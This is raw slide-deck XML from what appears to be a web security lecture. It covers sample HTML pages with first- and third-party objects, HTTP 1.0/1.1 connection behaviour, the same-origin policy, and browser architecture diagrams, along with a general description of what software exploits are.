            <a:r>
              <a:rPr lang="en-US" sz="18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&lt;/h1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25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lang="en-US" sz="180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“/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="180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/my_face.jpg"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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lang="en-US" sz="18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&lt;p&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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I am 12 and what is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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&lt;a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25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lang="en-US" sz="180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"wierd_thing.html"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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&lt;/a&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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lang="en-US" sz="18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&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25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lang="en-US" sz="180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“http://www.images.com/cat.jpg"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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&gt;&lt;/img&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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&lt;/html&gt;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9210092" y="365125"/>
            <a:ext cx="2438400" cy="1735494"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -51700"/>
              <a:gd name="adj2" fmla="val 721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 total objects:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>1 HTML,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>1 JavaScript,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>2 images</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22692059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Mixed Origins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719" y="1825625"/>
            <a:ext cx="522047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Webpages may be composed of objects from first- and third-party origins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First-party: the domain in the address bar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Third-party: all other domains</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 357"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5816082" y="1519881"/>
            <a:ext cx="6127102" cy="46570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056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7584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112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2640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241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C79C24"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C79C24"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>doctype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C79C24"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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endParaRPr lang="en-US" sz="18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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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&lt;html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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&lt;head&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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lang="en-US" sz="18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&lt;title&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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Hello World</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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    &lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4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lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>“../jquery.js”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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&lt;/head&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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&lt;body&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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lang="en-US" sz="18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&lt;h1&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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Hello World</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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&lt;/h1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25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lang="en-US" sz="180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“/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="180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/my_face.jpg"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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lang="en-US" sz="18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&lt;p&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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I am 12 and what is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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&lt;a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25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lang="en-US" sz="180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"wierd_thing.html"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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&lt;/a&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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lang="en-US" sz="18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&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25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lang="en-US" sz="180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“http://www.images.com/cat.jpg"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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&gt;&lt;/img&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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&lt;/html&gt;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8040855" y="5430740"/>
            <a:ext cx="1677556" cy="637579"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -39850"/>
              <a:gd name="adj2" fmla="val -799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Third-party</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25829749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0.9/1.0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request/response per TCP connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simple to implement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bad interactions with TCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires a new three-way handshake for each object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two extra round trip for each object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>High amounts of SYN/ACK overhead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download of each object begins in slow start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additionally, loss recovery is poor when windows are small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8881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1.1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Multiplex multiple transfers onto one TCP connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client keeps connection open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can send another request after the first completes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Must announce intention via a header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connection: keep-alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server must say how long response is, so client knows when done</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Length: XXX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11532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C9CC24-B375-4226-BF2B-61FADBBA6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70A28E-4FD8-4474-A206-E15B5EBB3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084747"/>
            <a:ext cx="12188952" cy="3294207"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent4"/>
              </a:gs>
              <a:gs pos="25000">
                <a:schemeClr val="accent4"/>
              </a:gs>
              <a:gs pos="94000">
                <a:schemeClr val="accent2"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2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9647E21-5366-4638-AC97-D8CD4111E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r="8214" b="45501"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="0" y="0"/>
            <a:ext cx="12191999" cy="4473360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D741175-FE23-4DB8-B23B-3C7BD0C5F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925" y="2076450"/>
            <a:ext cx="10684151" cy="13451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Same Origin Policy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35C120-54AC-48C8-B8B7-885B8226F0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71575" y="4473360"/>
            <a:ext cx="9469211" cy="8656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800" kern="12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8009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4D2C1-124C-4A0B-81B3-AD072C134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on Attacks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BFBF8-FA3E-4B93-88F3-FD2869233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8014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Software is notorious for having bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Functionality that doesn’t work as intended, or at all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Crashes that cause unreliability, data loss</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To an attacker, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>software bugs are opportunities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Weaponized software bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use programming errors to an attacker’s advantage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typical uses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bypass authentication and authorization checks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Elevate privileges (to admin or root)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hijack programs to execute unintended, arbitrary code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enable unauthorized, persistent access to systems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51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Architecture circa-1992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028" y="2282189"/>
            <a:ext cx="893446" cy="8934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0049" y="1514143"/>
            <a:ext cx="5527191" cy="461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Client Side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869" y="2282189"/>
            <a:ext cx="971550" cy="9715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38210" y="1514935"/>
            <a:ext cx="3356610" cy="4608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Server Side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37338" y="1514143"/>
            <a:ext cx="2390775" cy="46166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Protocols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92165" y="3844760"/>
            <a:ext cx="128112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Gopher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>HTTP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91464" y="3514396"/>
            <a:ext cx="1411605" cy="20116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Document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Renderer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64245" y="3514396"/>
            <a:ext cx="1805940" cy="520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HTML Parser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028" y="3998262"/>
            <a:ext cx="1043939" cy="104393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 rot="5400000">
            <a:off x="4849637" y="4329174"/>
            <a:ext cx="2264913" cy="3821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Network Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7405753" y="4329174"/>
            <a:ext cx="2264913" cy="3821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Network Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="11" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4370185" y="3774593"/>
            <a:ext cx="1420850" cy="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755275" y="3387776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HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Elbow Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="1"/>
            <a:endCxn id="10" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1703069" y="3774592"/>
            <a:ext cx="861176" cy="745643"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3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8729268" y="4537258"/>
            <a:ext cx="1120841" cy="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43895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Elbow Connector 54"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="1"/>
            <a:endCxn id="50" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1498923" y="4583541"/>
            <a:ext cx="1258155" cy="1549783"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 37639"/>
            </a:avLst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>
            <a:stCxn id="11" idx="1"/>
            <a:endCxn id="20" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="2564245" y="3774593"/>
            <a:ext cx="902970" cy="1357702"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -26005"/>
              <a:gd name="adj2" fmla="val 83864"/>
            </a:avLst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Architecture circa-2020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028" y="2282189"/>
            <a:ext cx="893446" cy="8934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0049" y="1514143"/>
            <a:ext cx="5527191" cy="461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Client Side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38210" y="1514935"/>
            <a:ext cx="3356610" cy="4608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Server Side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37338" y="1514143"/>
            <a:ext cx="2390775" cy="46166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Protocols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37338" y="3185204"/>
            <a:ext cx="23907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FTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>HTTP 1.0/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>HTTP 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SSL and TLS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Websocket</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>QUIC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91464" y="3514396"/>
            <a:ext cx="1411605" cy="20116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Document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Model and Renderer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64245" y="3514396"/>
            <a:ext cx="1805940" cy="520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HTML Parser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598" y="5140867"/>
            <a:ext cx="1043939" cy="104393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 rot="5400000">
            <a:off x="4849637" y="4329174"/>
            <a:ext cx="2264913" cy="3821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Network Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7405753" y="4329174"/>
            <a:ext cx="2264913" cy="3821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Network Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="11" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4370185" y="3774593"/>
            <a:ext cx="1420850" cy="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755275" y="3387776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HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Elbow Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
